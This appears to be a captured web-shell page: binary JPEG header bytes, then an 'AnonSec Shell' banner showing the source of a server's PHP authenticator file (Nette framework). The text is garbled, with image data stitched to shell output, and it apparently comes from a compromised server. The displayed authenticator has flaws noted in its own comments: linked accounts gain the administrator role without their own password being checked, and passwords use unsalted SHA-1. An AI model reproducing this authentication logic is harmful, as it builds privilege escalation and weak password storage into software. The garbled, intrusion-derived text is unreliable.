JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
Current File : /var/www/html/app/model/Authenticator.php
<?php

use Nette\Security;
use Nette\Utils\Strings;
use Nette\Database\Context;

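/**
 * Users authenticator.
 *
 * Looks a login up in both the `administrator` and the `client` table. When only
 * one of them matches, the account linked through `link_admin_client` is loaded
 * as well and its role is added to the resulting identity.
 *
 * NOTE(review): the linked account is fetched by id only; its own password is
 * never checked. A valid client password for a linked client therefore also
 * yields the "administrator" role. Confirm this is intended; if it is not,
 * grant each role only when that account's own credentials were verified.
 */
class Authenticator implements Security\IAuthenticator
{

    /** @var string Columns read for a client row; the password column is not among them. */
    private $clientReq = "
        id,
        email,
        bonus_program,
        bonus_points,
        name,
        surname,
        salesman,
        price_profile,
        course_default,
        country,
        user_group_id,
        prefix,
        company
    ";

    /** @var string Columns read for an administrator row. */
    private $adminReq = "id,username,role";

    /** @var Context Database access used for every lookup below. */
    private $database;

    /**
     * @param Context $database
     */
    public function __construct(Context $database)
    {
        $this->database = $database;
    }

    /**
     * Verifies the credentials and builds the identity for the matching account(s).
     *
     * The identity id and data are arrays keyed by "administrator" and/or "client";
     * the roles list holds the same two names.
     *
     * @param array $credentials [username or e-mail, plain-text password]
     * @return Security\Identity|Security\IIdentity
     * @throws Security\AuthenticationException when no account matches
     */
    public function authenticate(array $credentials)
    {
        list($username, $password) = $credentials;
        $userData = $this->getAdminUserData($username, $this->calculateHash($password));

        // Collected in real arrays: the previous code indexed into `false`, which
        // relies on auto-vivification that newer PHP versions deprecate.
        $ids = [];
        $roles = [];
        $data = [];

        if (is_array($userData["admin"]) && count($userData["admin"]) > 1) {
            // NOTE(review): the `role` column is selected but not checked here, so
            // every row of the administrator table receives the "administrator" role.
            $ids["administrator"] = $userData["admin"]["id"];
            $roles[] = "administrator";
            $data["administrator"] = $userData["admin"];
        }

        if (is_array($userData["client"]) && count($userData["client"]) > 1) {
            // Record the login time of the client account.
            $this->database->table("client")
                ->where(['id' => $userData["client"]["id"]])
                ->update(['logged_at' => new DateTime()]);

            $ids["client"] = $userData["client"]["id"];
            $roles[] = "client";
            $data["client"] = $userData["client"];

            // Defensive: never carry a password digest inside the identity.
            unset($data["client"]['password']);
        }

        if ($roles === []) {
            // Previously this path returned an identity with null id and roles.
            throw new Security\AuthenticationException('Toto uživatelské jméno neexistuje.', self::IDENTITY_NOT_FOUND);
        }

        return new Security\Identity($ids, $roles, $data);
    }

    /**
     * Computes the digest that is compared with the stored `password` column.
     *
     * NOTE(review): this is one unsalted SHA-1 round and $salt is ignored. SHA-1 is
     * a fast hash, so leaked rows are cheap to brute-force and equal passwords share
     * one digest. Changing only this method would lock out every existing account;
     * migrate by storing password_hash() output and upgrading each row on its next
     * successful login (password_verify() / password_needs_rehash()).
     *
     * @param  string $password plain-text password
     * @param  string|null $salt unused, kept so existing callers keep working
     * @return string hexadecimal SHA-1 digest
     */
    public function calculateHash($password, $salt = NULL)
    {
        return sha1($password);
    }

    /**
     * Finds the administrator and/or client matching the credentials and completes
     * the pair with the linked account when only one side matched.
     *
     * @param string $username login name (administrator) or e-mail (client)
     * @param string $password digest produced by calculateHash()
     * @return array ["admin" => array|null, "client" => array|null]
     * @throws Security\AuthenticationException when neither table has a match
     */
    private function getAdminUserData($username, $password)
    {
        $adminRow = $this->getAdminData($username, $password);
        $clientRow = $this->getClientData($username, $password);

        if ($adminRow == false && $clientRow == false) {
            throw new Security\AuthenticationException('Toto uživatelské jméno neexistuje.', self::IDENTITY_NOT_FOUND);
        }

        // The link row is fetched once per branch (it used to be queried twice).
        if ($adminRow != false && $clientRow == false) {
            $link = $this->getIdbyId($adminRow->id, 0);
            $clientRow = $link ? $this->getClientDataById($link->toArray()["client_id"]) : null;
        } elseif ($adminRow == false && $clientRow != false) {
            $link = $this->getIdbyId($clientRow->id, 1);
            $adminRow = $link ? $this->getAdminDataById($link->toArray()["administrator_id"]) : null;
        }

        return array(
            "admin" => $adminRow ? $adminRow->toArray() : null,
            "client" => $clientRow ? $clientRow->toArray() : null,
        );
    }

    /**
     * Active client whose e-mail and password digest both match.
     *
     * The digest is compared inside the query, so the comparison follows the
     * column's collation.
     *
     * @param string $username client e-mail
     * @param string $password digest produced by calculateHash()
     * @return false|\Nette\Database\Table\ActiveRow
     */
    private function getClientData($username, $password)
    {
        return $this->database->table("client")
            ->select($this->clientReq)
            ->where('email', $username)
            ->where('password', $password)
            ->where('is_active', 1)
            ->fetch();
    }

    /**
     * Administrator whose username and password digest both match.
     *
     * @param string $username administrator login name
     * @param string $password digest produced by calculateHash()
     * @return false|\Nette\Database\Table\ActiveRow
     */
    private function getAdminData($username, $password)
    {
        return $this->database->table("administrator")
            ->select($this->adminReq)
            ->where('username', $username)
            ->where('password', $password)
            ->fetch();
    }

    /**
     * Active client with the given id; no credential check is made here.
     *
     * @param mixed $id client id
     * @return false|\Nette\Database\Table\ActiveRow
     */
    private function getClientDataById($id)
    {
        return $this->database->table("client")
            ->select($this->clientReq)
            ->where('id', $id)
            ->where('is_active', 1)
            ->fetch();
    }

    /**
     * Administrator with the given id; no credential check is made here.
     *
     * @param mixed $id administrator id
     * @return false|\Nette\Database\Table\ActiveRow
     */
    private function getAdminDataById($id)
    {
        return $this->database->table("administrator")
            ->select($this->adminReq)
            ->where('id', $id)
            ->fetch();
    }

    /**
     * Reads the `link_admin_client` row that pairs an administrator with a client.
     *
     * @param mixed $id administrator id when $method is 0, client id when it is 1
     * @param int $method 0 = look up by administrator_id and select client_id,
     *                    1 = look up by client_id and select administrator_id
     * @return bool|false|\Nette\Database\Table\ActiveRow false for any other $method
     */
    private function getIdbyId($id, $method = 0)
    {
        if ($method === 0) {
            return $this->database->table("link_admin_client")
                ->select("client_id")
                ->where('administrator_id', $id)
                ->fetch();
        }

        // This used to be `$method = 1`, an assignment that is always true, so the
        // final `return false` could never be reached.
        if ($method === 1) {
            return $this->database->table("link_admin_client")
                ->select("administrator_id")
                ->where('client_id', $id)
                ->fetch();
        }

        return false;
    }

}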
